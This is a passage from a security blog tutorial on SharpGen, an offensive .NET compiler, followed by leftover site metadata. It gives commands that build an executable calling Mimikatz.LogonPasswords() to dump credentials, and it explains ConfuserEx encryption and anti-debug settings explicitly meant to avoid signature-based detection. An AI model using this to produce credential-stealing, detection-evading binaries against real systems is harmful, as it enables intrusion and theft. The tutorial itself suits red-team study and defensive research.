SharpGen\u002FReferences\u002Freferences.yml\u003C\u002Fp>\u003Cp>The DLLs here are typically reference files used by C# programs\u003C\u002Fp>\u003Cp>Change the Enabled property from true to false for unnecessary DLL names\u003C\u002Fp>\u003Ch4>(2) Remove references to specified DLLs\u003C\u002Fh4>\u003Cp>Edit the file SharpGen\u002FResources\u002Fresources.yml\u003C\u002Fp>\u003Cp>The DLLs here implement mimikatz functionality\u003C\u002Fp>\u003Cp>Change the Enabled property of unwanted dll names from true to false\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>powerkatz_x64.dll is the 64-bit version of mimikatz\u003C\u002Fli>\u003Cli>powerkatz_x64.dll.comp is the compressed 64-bit mimikatz using the System.IO.Compression library\u003C\u002Fli>\u003Cli>powerkatz_x86.dll is the 32-bit version of mimikatz\u003C\u002Fli>\u003Cli>powerkatz_x86.dll.comp is the compressed 32-bit mimikatz using the System.IO.Compression library\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>(3) Using ConfuserEx resource protection\u003C\u002Fh4>\u003Cp>ConfuserEx resource protection encrypts and compresses resources with LZMA\u003C\u002Fp>\u003Cp>Example command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe --confuse confuse.cr \"Console.WriteLine(Mimikatz.LogonPasswords());\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Calling other open-source libraries\u003C\u002Fh3>\u003Cp>This part is not covered in the reference materials; here is my solution\u003C\u002Fp>\u003Cp>Two examples are provided here: one is the open-source SharpWMI, and the other is my own template SharpTest\u003C\u002Fp>\u003Ch4>1. Adding calls to SharpWMI\u003C\u002Fh4>\u003Cp>(1) Copy the SharpWMI source code to SharpGen\u002FSource\u003C\u002Fp>\u003Cp>(2) Modify SharpGen\u002FSharpGen.csproj\u003C\u002Fp>\u003Cp>Add \u003Ccompile remove=\"Source\\SharpWMI\\Program.cs\"> to the ItemGroup tag\u003C\u002Fcompile>\u003C\u002Fp>\u003Cp>Otherwise, an error will be reported when compiling SharpGen:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Source\\SharpWMI\\Program.cs(3,14): error CS0234: The type or namespace name 'Management' does not exist in the namespace 'System' (are you missing an assembly reference?)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Modify the source code of SharpWMI\u003C\u002Fp>\u003Cp>Keep only Program.cs, delete the Main function, and change each static method in Program.cs to a public method\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Cp>static void LocalWMIQuery(string wmiQuery, string wmiNameSpace = \"\") needs to be modified to public static void LocalWMIQuery(string wmiQuery, string wmiNameSpace = \"\")\u003C\u002Fp>\u003Cp>(4) Recompile SharpGen\u003C\u002Fp>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet build --configuration Release\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(5) Call test\u003C\u002Fp>\u003Cp>The function of example.txt is to call the LocalWMIQuery method in SharpWMI to query win32_ComputerSystem, with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SharpWMI.Program.LocalWMIQuery(\"select * from win32_ComputerSystem\");\u003Cbr>Console.WriteLine(Host.GetProcessList());\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The commands for SharpGen are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe --source-file example.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generate example.ex and execute it, the call is successful, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017325848_2_83445b7252-1.jpeg\">\u003C\u002Fp>\u003Ch4>2. Add self-written C# template\u003C\u002Fh4>\u003Cp>Name it SharpTest, with the function of receiving parameters and outputting to the command line\u003C\u002Fp>\u003Cp>(1) Create a new folder SharpTest, and create a new file Program.cs inside, with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Management;\u003Cbr>namespace SharpTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        public static void TestMethod(string string1)\u003Cbr>        {\u003Cbr>            Console.WriteLine(string1);\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Modify SharpGen\u002FSharpGen.csproj\u003C\u002Fp>\u003Cp>Add \u003Ccompile remove=\"Source\\SharpTest\\Program.cs\"> within the ItemGroup tag.\u003C\u002Fcompile>\u003C\u002Fp>\u003Cp>(3) Recompile SharpGen\u003C\u002Fp>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet build --configuration Release\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Invoke the test\u003C\u002Fp>\u003Cp>The function of example.txt is to call the TestMethod in SharpTest with the parameter 123456, with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SharpTest.Program.TestMethod(\"123456\");\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command for SharpGen is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe --source-file example.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generate example.exe and execute it, the call is successful, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017376915_3_f33a84b7f8-1.jpeg\">\u003C\u002Fp>\u003Cp>For testing convenience, I have forked cobbr's SharpGen and added calls to SharpWMI and SharpTest. The address is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch3>3. Resource Protection\u003C\u002Fh3>\u003Cp>Using the new version of ConfuserEx can protect the resources of compiled files. The address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fmkaring\u002FConfuserEx\u003C\u002Fp>\u003Cp>The old version of ConfuserEx is no longer maintained. The address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fyck1509\u002FConfuserEx\u003C\u002Fp>\u003Cp>Example command call:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe --confuse confuse.cr \"Console.WriteLine(Mimikatz.LogonPasswords());\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding configuration file used is SharpGen\u002Fconfuse.cr\u003C\u002Fp>\u003Cp>The default configuration is to encrypt resources and apply LZMA compression\u003C\u002Fp>\u003Cp>ConfuserEx also supports other protection features:\u003C\u002Fp>\u003Cul>\u003Cli>Anti Debug Protection\u003C\u002Fli>\u003Cli>Anti Dump Protection\u003C\u002Fli>\u003Cli>Anti IL Dasm Protection\u003C\u002Fli>\u003Cli>Anti Tamper Protection\u003C\u002Fli>\u003Cli>Constants Protection\u003C\u002Fli>\u003Cli>Control Flow Protection\u003C\u002Fli>\u003Cli>Invalid Metadata Protection\u003C\u002Fli>\u003Cli>Name Protection\u003C\u002Fli>\u003Cli>Reference Proxy Protection\u003C\u002Fli>\u003Cli>Resources Protection\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Simply remove the corresponding comments in SharpGen\u002Fconfuse.cr\u003C\u002Fp>\u003Cp>For example, to add anti-debug functionality, the configuration file confuse.cr content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cproject basedir=\"{0}\" outputdir=\"{1}\" xmlns=\"http:\u002F\u002Fconfuser.codeplex.com\">\u003Cbr>    \u003Cmodule path=\"{2}\">\u003Cbr>      \u003Crule pattern=\"true\" inherit=\"false\">\u003Cbr>         \u003C!-- \u003Cprotection id=\"anti debug\" \u002F>       -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"anti dump\" \u002F>        -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"anti ildasm\" \u002F>      -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"anti tamper\" \u002F>      -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"constants\" \u002F>        -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"ctrl flow\" \u002F>        -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"invalid metadata\" \u002F> -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"ref proxy\" \u002F>        -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"rename\" \u002F>           -->\u003Cbr>         \u003Cprotection id=\"resources\">\u003Cbr>         \u003Cprotection id=\"anti debug\">\u003Cbr>      \u003C\u002Fprotection>\u003C\u002Fprotection>\u003C\u002Frule>\u003Cbr>    \u003C\u002Fmodule>\u003Cbr>\u003C\u002Fproject>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Additional note: Disabling optimization\u003C\u002Fh3>\u003Cp>SharpGen optimizes source code during compilation. Optimization can be disabled using the --no-optimization parameter, which will increase the size of the generated file.\u003C\u002Fp>\u003Ch2>0x05 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SharpGen can serve as a platform for repackaging .NET assemblies, offering the following advantages:\u003C\u002Fp>\u003Cul>\u003Cli>Utilizes the .NET Core platform and Roslyn for dynamic compilation, allowing developers to choose multiple platforms (Linux, macOS, and Windows) during code development.\u003C\u002Fli>\u003Cli>Can call other open-source libraries to customize functionality, ultimately packaging it into a standalone .exe or .dll file.\u003C\u002Fli>\u003Cli>Uses ConfuserEx to encrypt and compress resources, avoiding signature-based detection.\u003C\u002Fli>\u003Cli>Generated files support .NET 3.5 and .NET 4.0.\u003C\u002Fli>\u003Cli>Generated files support x86 and x64 architectures.\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Furthermore, SharpGen enables rapid conversion of .NET assembly-based POCs into EXPs.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the functionality of SharpGen, shares methods for implementing calls to other open-source libraries, and analyzes the advantages of SharpGen.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",826,"Onedaysec",6,"published","2026-02-02T07:38:21.454Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"SharpGen .NET Tool: Compile & Encrypt Assemblies for Security","SharpGen, .NET Core, Roslyn, assembly encryption, C# compilation, SharpSploit, Mimikatz, .NET security tools",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46,47],671,670,668,667,{"title":39,"description":39,"image":39},"2026-07-24T15:37:11.977Z","2026-07-23T16:01:56.438Z","draft","2026-07-23T16:14:05.636Z"]